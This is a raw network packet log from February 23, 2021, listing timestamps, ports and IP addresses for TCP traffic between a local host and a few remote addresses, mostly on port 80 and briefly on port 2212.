Feb 23, 2021 15:31:13.896939039 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.896962881 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.896971941 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.897536039 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897553921 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897572041 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897591114 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897608042 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897624969 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897641897 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897659063 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897675991 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897679090 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.897692919 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897707939 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.897713900 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.897716999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897727966 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.897737980 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897766113 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897778988 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.897798061 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.897958040 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.898663998 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898684978 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898699045 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898710966 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898727894 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898745060 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898746967 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.898766041 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.898817062 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.898878098 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898895979 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898912907 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898931026 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898932934 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.898948908 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898956060 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.898966074 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.898989916 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899007082 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.899012089 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899029970 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899043083 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899055958 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899060965 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.899075031 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899091959 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899091959 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.899108887 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899127007 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.899164915 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.899853945 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899877071 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899893999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899910927 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899928093 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899946928 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899955034 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.899965048 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.899985075 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.900002956 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900016069 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900051117 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900068998 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900080919 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900098085 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900114059 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900166988 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.900194883 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.900729895 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900752068 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900769949 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900782108 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900791883 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.900799990 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900818110 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900835037 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900851965 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900854111 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.900873899 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900892019 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900898933 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.900911093 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900923967 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.900928020 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900944948 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900959969 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.900983095 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.901005030 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.901663065 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901681900 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901699066 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901715040 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901734114 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.901737928 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901758909 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901774883 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901793957 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.901796103 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901810884 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.901815891 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901834011 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901839018 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.901850939 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901866913 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.901870012 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901886940 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901899099 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.901902914 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.901935101 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.902590990 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902610064 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902626038 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902642965 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902659893 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902679920 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902698040 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902714968 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902731895 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902750015 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902765989 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902767897 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.902782917 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902786970 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.902792931 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.902796984 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.902801991 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902812004 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.902823925 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.902862072 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.903532982 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903551102 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903568029 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903583050 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903603077 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903609037 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.903620958 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903635025 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903635979 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.903649092 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903661966 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903687954 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903707981 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903722048 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.903723955 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903743982 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903759956 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.903773069 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.903821945 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.904438972 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904458046 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904474020 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904491901 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904508114 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904525042 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904541016 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.904580116 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.904813051 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904833078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904849052 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904866934 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904881001 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.904884100 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904902935 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904921055 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.904922962 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904939890 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904942036 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.904963017 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904980898 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.904983997 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.904999971 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905016899 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905033112 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905039072 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.905050993 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905066013 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.905091047 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.905761957 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905781031 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905797958 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905813932 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905828953 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.905831099 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905852079 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905852079 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.905870914 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905888081 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905901909 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.905905962 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905925035 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905941963 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905958891 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905976057 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.905975103 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.905997992 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906025887 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.906075954 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.906677008 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906697035 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906713963 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906730890 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906749010 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906753063 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.906769037 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906776905 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.906790972 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906809092 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906809092 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.906826973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906841993 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.906843901 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906862020 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906873941 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.906878948 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906898975 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906919003 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.906933069 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.906970024 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.907618999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907639027 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907656908 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907672882 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907689095 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907701969 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.907708883 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907727957 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907746077 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907747984 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.907763004 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907779932 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907795906 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907805920 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.907813072 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907830954 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907841921 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.907850981 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.907869101 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.907890081 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.908541918 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908564091 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908581972 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908597946 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908615112 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908627987 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.908632040 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908649921 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908653021 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.908667088 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908682108 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.908684015 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908700943 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.908704996 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908721924 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.908724070 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908741951 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908759117 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908770084 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.908776999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.908816099 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.909455061 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.909477949 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.909495115 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.909509897 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.909563065 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.909591913 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:19.479600906 CET	49754	2212	192.168.2.4	185.157.160.233
Feb 23, 2021 15:31:21.189245939 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:22.482732058 CET	49754	2212	192.168.2.4	185.157.160.233
Feb 23, 2021 15:31:25.407396078 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:25.470767021 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.528105974 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.581038952 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.581347942 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.583986998 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584017038 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584033966 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584052086 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584072113 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584089994 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584100962 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.584108114 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584125042 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584130049 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:25.584140062 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584161043 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584178925 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584194899 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584206104 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:25.584213018 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584213972 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:25.584229946 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584247112 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584259033 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.584294081 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:25.584299088 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:25.584352970 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:25.592324018 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.592346907 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.592363119 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.592382908 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.592400074 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.592411995 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:25.592524052 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:25.592556953 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:25.636980057 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705216885 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705254078 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705274105 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705291986 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705307961 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705324888 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705339909 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705357075 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705373049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705399036 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.705409050 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705427885 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.705430031 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.705430984 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.705466032 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.706463099 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.706491947 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.706773996 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.707711935 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.707739115 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.708914042 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.708935976 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.708981991 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.708993912 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.710143089 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.710165024 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.710783005 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.711371899 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.711393118 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.711719036 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.712625027 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.712649107 CET	80	49755	172.67.172.17	192.168.2.4
